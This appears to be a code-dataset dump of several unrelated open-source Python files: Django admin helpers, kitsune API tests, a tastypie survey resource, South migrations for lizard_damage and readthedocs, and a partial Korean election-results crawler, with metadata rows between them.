def has_auto_field(self):
if self.form._meta.model._meta.has_auto_field:
return True
# Also search any parents for an auto field.
for parent in self.form._meta.model._meta.get_parent_list():
if parent._meta.has_auto_field:
return True
return False
def field_count(self):
# tabular.html uses this function for colspan value.
num_of_fields = 0
if self.has_auto_field():
num_of_fields += 1
num_of_fields += len(self.fieldsets[0][1]["fields"])
if self.formset.can_order:
num_of_fields += 1
if self.formset.can_delete:
num_of_fields += 1
return num_of_fields
def pk_field(self):
return AdminField(self.form, self.formset._pk_field.name, False)
def fk_field(self):
fk = getattr(self.formset, "fk", None)
if fk:
return AdminField(self.form, fk.name, False)
else:
return ""
def deletion_field(self):
from django.forms.formsets import DELETION_FIELD_NAME
return AdminField(self.form, DELETION_FIELD_NAME, False)
def ordering_field(self):
from django.forms.formsets import ORDERING_FIELD_NAME
return AdminField(self.form, ORDERING_FIELD_NAME, False)
class InlineFieldset(Fieldset):
def __init__(self, formset, *args, **kwargs):
self.formset = formset
super(InlineFieldset, self).__init__(*args, **kwargs)
def __iter__(self):
fk = getattr(self.formset, "fk", None)
for field in self.fields:
if fk and fk.name == field:
continue
yield Fieldline(self.form, field, self.readonly_fields,
model_admin=self.model_admin)
class AdminErrorList(forms.util.ErrorList):
"""
Stores all errors for the form/formsets in an add/change stage view.
"""
def __init__(self, form, inline_formsets):
if form.is_bound:
self.extend(form.errors.values())
for inline_formset in inline_formsets:
self.extend(inline_formset.non_form_errors())
for errors_in_inline_form in inline_formset.errors:
self.extend(errors_in_inline_form.values())
def normalize_fieldsets(fieldsets):
"""
Make sure the keys in fieldset dictionaries are strings. Returns the
normalized data.
"""
result = []
for name, options in fieldsets:
result.append((name, normalize_dictionary(options)))
return result
def normalize_dictionary(data_dict):
"""
Converts all the keys in "data_dict" to strings. The keys must be
convertible using str().
"""
for key, value in data_dict.items():
if not isinstance(key, str):
del data_dict[key]
data_dict[str(key)] = value
return data_dict
| apache-2.0 | 2,401,198,676,081,120,000 | 37.845481 | 133 | 0.602372 | false |
turtleloveshoes/kitsune | kitsune/community/tests/test_api.py | 13 | 8753 | from datetime import datetime, timedelta
from nose.tools import eq_
from django.test.client import RequestFactory
from kitsune.community import api
from kitsune.products.tests import product
from kitsune.questions.tests import answer, answervote, question
from kitsune.search.tests import ElasticTestCase
from kitsune.users.tests import profile
from kitsune.wiki.tests import document, revision
class TestTopContributorsBase(ElasticTestCase):
"""Tests for the Community Hub top users API."""
def setUp(self):
super(TestTopContributorsBase, self).setUp()
self.factory = RequestFactory()
self.api = api.TopContributorsBase()
self.api.get_data = lambda request: {}
def test_invalid_filter_name(self):
req = self.factory.get('/', {'not_valid': 'wrong'})
self.api.request = req
self.api.get_filters()
eq_(self.api.warnings, ['Unknown filter not_valid'])
class TestTopContributorsQuestions(ElasticTestCase):
def setUp(self):
super(TestTopContributorsQuestions, self).setUp()
self.factory = RequestFactory()
self.api = api.TopContributorsQuestions()
def test_it_works(self):
u1 = profile().user
u2 = profile().user
a1 = answer(creator=u1, save=True) # noqa
a2 = answer(creator=u1, save=True)
a3 = answer(creator=u2, save=True)
a1.question.solution = a1
a1.question.save()
answervote(answer=a3, helpful=True, save=True)
self.refresh()
req = self.factory.get('/')
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['rank'], 1)
eq_(data['results'][0]['answer_count'], 2)
eq_(data['results'][0]['solution_count'], 1)
eq_(data['results'][0]['helpful_vote_count'], 0)
eq_(data['results'][0]['last_contribution_date'], a2.created.replace(microsecond=0))
eq_(data['results'][1]['user']['username'], u2.username)
eq_(data['results'][1]['rank'], 2)
eq_(data['results'][1]['answer_count'], 1)
eq_(data['results'][1]['solution_count'], 0)
eq_(data['results'][1]['helpful_vote_count'], 1)
eq_(data['results'][1]['last_contribution_date'], a3.created.replace(microsecond=0))
def test_filter_by_product(self):
u1 = profile().user
u2 = profile().user
p1 = product(save=True)
p2 = product(save=True)
q1 = question(product=p1, save=True)
answer(question=q1, creator=u1, save=True)
q2 = question(product=p2, save=True)
answer(question=q2, creator=u1, save=True)
q3 = question(product=p2, save=True)
answer(question=q3, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'product': p1.slug})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['answer_count'], 1)
def test_page_size(self):
u1 = profile().user
u2 = profile().user
q1 = question(save=True)
answer(question=q1, creator=u1, save=True)
q2 = question(save=True)
answer(question=q2, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'page_size': 2})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 2)
req = self.factory.get('/', {'page_size': 1})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 1)
def test_filter_last_contribution(self):
u1 = profile().user
u2 = profile().user
today = datetime.now()
yesterday = today - timedelta(days=1)
day_before_yesterday = yesterday - timedelta(days=1)
answer(creator=u1, created=today, save=True)
answer(creator=u1, created=day_before_yesterday, save=True)
answer(creator=u2, created=day_before_yesterday, save=True)
self.refresh()
# Test 1
req = self.factory.get('/', {'last_contribution_date__gt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
# Even though only 1 contribution was made in the time range, this filter
# is only checking the last contribution time, so both are included.
eq_(data['results'][0]['answer_count'], 2)
# Test 2
req = self.factory.get('/', {'last_contribution_date__lt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u2.username)
eq_(data['results'][0]['answer_count'], 1)
class TestTopContributorsLocalization(ElasticTestCase):
def setUp(self):
super(TestTopContributorsLocalization, self).setUp()
self.factory = RequestFactory()
self.api = api.TopContributorsLocalization()
def test_it_works(self):
u1 = profile().user
u2 = profile().user
r1 = revision(creator=u1, save=True) # noqa
r2 = revision(creator=u1, save=True)
r3 = revision(creator=u2, save=True)
r2.reviewer = u2
r2.save()
self.refresh()
req = self.factory.get('/')
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['rank'], 1)
eq_(data['results'][0]['revision_count'], 2)
eq_(data['results'][0]['review_count'], 0)
eq_(data['results'][0]['last_contribution_date'], r2.created.replace(microsecond=0))
eq_(data['results'][1]['user']['username'], u2.username)
eq_(data['results'][1]['rank'], 2)
eq_(data['results'][1]['revision_count'], 1)
eq_(data['results'][1]['review_count'], 1)
eq_(data['results'][1]['last_contribution_date'], r3.created.replace(microsecond=0))
def test_filter_by_product(self):
u1 = profile().user
u2 = profile().user
p1 = product(save=True)
p2 = product(save=True)
d1 = document(save=True)
d1.products.add(p1)
revision(document=d1, creator=u1, save=True)
d2 = document(save=True)
d2.products.add(p2)
revision(document=d2, creator=u1, save=True)
d3 = document(save=True)
d3.products.add(p2)
revision(document=d3, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'product': p1.slug})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['revision_count'], 1)
def test_page_size(self):
u1 = profile().user
u2 = profile().user
d1 = document(save=True)
revision(document=d1, creator=u1, save=True)
d2 = document(save=True)
revision(document=d2, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'page_size': 2})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 2)
req = self.factory.get('/', {'page_size': 1})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 1)
def test_filter_last_contribution(self):
u1 = profile().user
u2 = profile().user
today = datetime.now()
yesterday = today - timedelta(days=1)
day_before_yesterday = yesterday - timedelta(days=1)
revision(creator=u1, created=today, save=True)
revision(creator=u1, created=day_before_yesterday, save=True)
revision(creator=u2, created=day_before_yesterday, save=True)
self.refresh()
# Test 1
req = self.factory.get('/', {'last_contribution_date__gt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
# Even though only 1 contribution was made in the time range, this filter
# is only checking the last contribution time, so both are included.
eq_(data['results'][0]['revision_count'], 2)
# Test 2
req = self.factory.get('/', {'last_contribution_date__lt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u2.username)
eq_(data['results'][0]['revision_count'], 1)
| bsd-3-clause | 318,551,336,583,031,500 | 31.782772 | 99 | 0.583686 | false |
ISIFoundation/influenzanet-website | apps/survey/api/resources.py | 4 | 2676 | from tastypie.resources import ModelResource
from apps.survey.models import Profile, SurveyUser, Survey
from apps.survey.survey import parse_specification
from apps.survey.spec import Question, Branch, Else
from pickle import loads
from inspect import isclass
class EpiwebModelResource(ModelResource):
class Meta:
default_format = 'application/json'
include_resource_uri = False
allowed_methods = ['get']
def xmlify_spec(spec):
p = parse_specification(spec)
def a(s):
return str(s)
def t(tag, s):
return a('<%s>\n' % tag) + a(s) + a('</%s>\n' % tag)
def xo(options):
return reduce(lambda s,o: s+t('option', t('code', o[0]) + t('text', o[1])) ,
options, '')
def xs(f):
if not f:
return ''
if isinstance(f, str):
return f + '\n'
if isinstance(f, list) or isinstance(f, tuple):
return xs(f[0]) + xs(f[1:])
elif isinstance(f, Else):
return t('else', f.rules)
elif isinstance(f, Branch):
# Process condition here!!!
return t('branch', t('condition', f.condition) + t('rules', f.rules))
elif isclass(f) and issubclass(f, Question):
x = t('type', f.type)
x += t('question', f.question)
if 'options' in dir(f):
x += xo(f.options)
return t('item', x)
else:
t('unknown', type(f))
xml = t('survey', xs(p.rules))
return xml
## EIP resources
class GetUserProfile(EpiwebModelResource):
"""Takes global_id
Returns name, a_uids, code, report_ts
"""
class Meta:
resource_name = 'GetUserProfile'
queryset = Profile.objects.all()
# queryset = Profile.objects.filter(user__global_id="193807d8-4a30-4601-9bc5-bc59db1696cd")
filtering = ['user__global_id']
# fields = ['data']
def dehydrate(self, bundle):
id = bundle.data['id']
return loads(str(bundle.data['data']))
class GetReportSurvey(ModelResource):
"""Takes language int
Returns survey in XML format
"""
class Meta:
resource_name = 'GetReportSurvey'
queryset = Survey.objects.all()
fields = ['specification']
def dehydrate(self, bundle):
spec = bundle.data['specification']
xml = xmlify_spec(spec)
return xml
# return str(parse_specification(bundle.data['specification']))
class Report(ModelResource):
"""Takes uid and reportS
Returns status
"""
class Meta:
queryset = SurveyUser.objects.all()
allowed_methods = ['put']
| agpl-3.0 | -4,251,068,543,518,573,600 | 29.067416 | 99 | 0.575859 | false |
lizardsystem/lizard-damage | lizard_damage/migrations/0025_auto__add_field_damagescenario_ahn_version.py | 1 | 9142 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'DamageScenario.ahn_version'
db.add_column(u'lizard_damage_damagescenario', 'ahn_version',
self.gf('django.db.models.fields.CharField')(default=2, max_length=2),
keep_default=False)
def backwards(self, orm):
# Deleting field 'DamageScenario.ahn_version'
db.delete_column(u'lizard_damage_damagescenario', 'ahn_version')
models = {
u'lizard_damage.benefitscenario': {
'Meta': {'object_name': 'BenefitScenario'},
'datetime_created': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '128'}),
'expiration_date': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'zip_result': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'zip_risk_a': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'zip_risk_b': ('django.db.models.fields.files.FileField', [], {'max_length': '100'})
},
u'lizard_damage.benefitscenarioresult': {
'Meta': {'object_name': 'BenefitScenarioResult'},
'benefit_scenario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.BenefitScenario']"}),
'east': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'north': ('django.db.models.fields.FloatField', [], {}),
'south': ('django.db.models.fields.FloatField', [], {}),
'west': ('django.db.models.fields.FloatField', [], {})
},
u'lizard_damage.damageevent': {
'Meta': {'object_name': 'DamageEvent'},
'floodmonth': ('django.db.models.fields.IntegerField', [], {'default': '9'}),
'floodtime': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_height': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'min_height': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'repairtime_buildings': ('django.db.models.fields.FloatField', [], {'default': '432000'}),
'repairtime_roads': ('django.db.models.fields.FloatField', [], {'default': '432000'}),
'repetition_time': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'scenario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageScenario']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'table': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'lizard_damage.damageeventresult': {
'Meta': {'object_name': 'DamageEventResult'},
'damage_event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageEvent']"}),
'east': ('django.db.models.fields.FloatField', [], {}),
'geotransform_json': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'north': ('django.db.models.fields.FloatField', [], {}),
'relative_path': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'result_type': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'south': ('django.db.models.fields.FloatField', [], {}),
'west': ('django.db.models.fields.FloatField', [], {})
},
u'lizard_damage.damageeventwaterlevel': {
'Meta': {'ordering': "(u'index',)", 'object_name': 'DamageEventWaterlevel'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageEvent']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'}),
'waterlevel_path': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'lizard_damage.damagescenario': {
'Meta': {'object_name': 'DamageScenario'},
'ahn_version': ('django.db.models.fields.CharField', [], {'default': '2', 'max_length': '2'}),
'calc_type': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'customheights': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'customlanduse': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'customlandusegeoimage': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.GeoImage']", 'null': 'True', 'blank': 'True'}),
'damagetable_file': ('django.db.models.fields.FilePathField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'datetime_created': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '128'}),
'expiration_date': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'scenario_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
u'lizard_damage.geoimage': {
'Meta': {'object_name': 'GeoImage'},
'east': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'north': ('django.db.models.fields.FloatField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'south': ('django.db.models.fields.FloatField', [], {}),
'west': ('django.db.models.fields.FloatField', [], {})
},
u'lizard_damage.riskresult': {
'Meta': {'object_name': 'RiskResult'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'scenario': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lizard_damage.DamageScenario']"}),
'zip_risk': ('django.db.models.fields.files.FileField', [], {'max_length': '100'})
},
u'lizard_damage.roads': {
'Meta': {'object_name': 'Roads', 'db_table': "u'data_roads'"},
'gid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'gridcode': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'the_geom': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'srid': '28992', 'null': 'True', 'blank': 'True'}),
'typeinfr_1': ('django.db.models.fields.CharField', [], {'max_length': '25', 'blank': 'True'}),
'typeweg': ('django.db.models.fields.CharField', [], {'max_length': '120', 'blank': 'True'})
},
u'lizard_damage.unit': {
'Meta': {'object_name': 'Unit'},
'factor': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['lizard_damage'] | gpl-3.0 | 5,769,901,754,726,166,000 | 69.330769 | 163 | 0.550427 | false |
KamranMackey/readthedocs.org | readthedocs/projects/migrations/0041_add_programming_language.py | 8 | 12231 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Project.programming_language'
db.add_column(u'projects_project', 'programming_language',
self.gf('django.db.models.fields.CharField')(default='none', max_length=20),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Project.programming_language'
db.delete_column(u'projects_project', 'programming_language')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'builds.version': {
'Meta': {'ordering': "['-verbose_name']", 'unique_together': "[('project', 'slug')]", 'object_name': 'Version'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'built': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'machine': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'privacy_level': ('django.db.models.fields.CharField', [], {'default': "'public'", 'max_length': '20'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'versions'", 'to': u"orm['projects.Project']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'supported': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'unknown'", 'max_length': '20'}),
'uploaded': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'projects.emailhook': {
'Meta': {'object_name': 'EmailHook'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'emailhook_notifications'", 'to': u"orm['projects.Project']"})
},
u'projects.importedfile': {
'Meta': {'object_name': 'ImportedFile'},
'commit': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'imported_files'", 'to': u"orm['projects.Project']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'version': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'imported_filed'", 'null': 'True', 'to': u"orm['builds.Version']"})
},
u'projects.project': {
'Meta': {'ordering': "('slug',)", 'object_name': 'Project'},
'analytics_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'canonical_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'conf_py_file': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'copyright': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'default_branch': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_version': ('django.db.models.fields.CharField', [], {'default': "'latest'", 'max_length': '255'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'django_packages_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'documentation_type': ('django.db.models.fields.CharField', [], {'default': "'sphinx'", 'max_length': '20'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '20'}),
'main_language_project': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'translations'", 'null': 'True', 'to': u"orm['projects.Project']"}),
'mirror': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'num_major': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'num_minor': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'num_point': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'privacy_level': ('django.db.models.fields.CharField', [], {'default': "'public'", 'max_length': '20'}),
'programming_language': ('django.db.models.fields.CharField', [], {'default': "'none'", 'max_length': '20'}),
'project_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'python_interpreter': ('django.db.models.fields.CharField', [], {'default': "'python'", 'max_length': '20'}),
'related_projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['projects.Project']", 'null': 'True', 'through': u"orm['projects.ProjectRelationship']", 'blank': 'True'}),
'repo': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'repo_type': ('django.db.models.fields.CharField', [], {'default': "'git'", 'max_length': '10'}),
'requirements_file': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'single_version': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'skip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "'.rst'", 'max_length': '10'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '20'}),
'use_system_packages': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_virtualenv': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects'", 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'version_privacy_level': ('django.db.models.fields.CharField', [], {'default': "'public'", 'max_length': '20'})
},
u'projects.projectrelationship': {
'Meta': {'object_name': 'ProjectRelationship'},
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'superprojects'", 'to': u"orm['projects.Project']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subprojects'", 'to': u"orm['projects.Project']"})
},
u'projects.webhook': {
'Meta': {'object_name': 'WebHook'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'webhook_notifications'", 'to': u"orm['projects.Project']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
}
}
complete_apps = ['projects'] | mit | -3,244,198,992,383,329,000 | 82.210884 | 232 | 0.557436 | false |
teampopong/crawlers | election_commission/crawlers/assembly/base.py | 3 | 3547 | #!/usr/bin/python2.7
# -*- encoding=utf-8 -*-
import gevent
from gevent import monkey
import itertools
from urlparse import urljoin
from utils import flatten, get_json, get_xpath, parse_cell, sanitize, split
monkey.patch_all()
class BaseCrawler(object):
url_image_base = 'http://info.nec.go.kr'
attrs = []
attrs_exclude_parse_cell = ['image']
def parse(self, url, city_name=None):
elems = get_xpath(url, '//td')
num_attrs = len(self.attrs)
members = (dict(zip(self.attrs, elems[i*num_attrs:(i+1)*num_attrs]))\
for i in xrange(len(elems) / num_attrs))
members = [self.parse_member(member, city_name=city_name) for member in members]
print 'crawled #%d - %s(%d)...' % (self.nth, city_name or '๋น๋ก๋ํ', len(members))
return members
def parse_record(self, record):
for attr in self.attrs:
if attr not in self.attrs_exclude_parse_cell:
record[attr] = parse_cell(record[attr])
def parse_member(self, member, city_name=None):
self.parse_record(member)
# never change the order
member['assembly_no'] = self.nth
member['elected'] = self.__class__.__name__.startswith('Elected')
self.parse_member_image(member)
self.parse_member_name(member)
self.parse_member_birth(member)
self.parse_member_district(member, city_name)
self.parse_member_vote(member)
return member
def parse_member_image(self, member):
if 'image' not in member: return
rel_path = member['image'].find("./input[@type='image']").attrib['src']
member['image'] = urljoin(self.url_image_base, rel_path)
def parse_member_name(self, member):
if 'name' not in member: return
member['name_kr'], member['name_cn'] = map(sanitize, member['name'][:2])
del member['name']
def parse_member_birth(self, member):
if 'birth' not in member: return
member['birthyear'], member['birthmonth'], member['birthday'] =\
split(member['birth'][0])
del member['birth']
def parse_member_district(self, member, city_name):
if city_name:
member['district'] = '%s %s' % (city_name, member['district'])
def parse_member_vote(self, member):
if 'vote' not in member: return
member['votenum'], member['voterate'] = map(sanitize, member['vote'][:2])
member['votenum'] = member['votenum'].replace(',', '')
del member['vote']
class MultiCityCrawler(BaseCrawler):
def city_codes(self):
list_ = get_json(self.url_city_codes_json)['body']
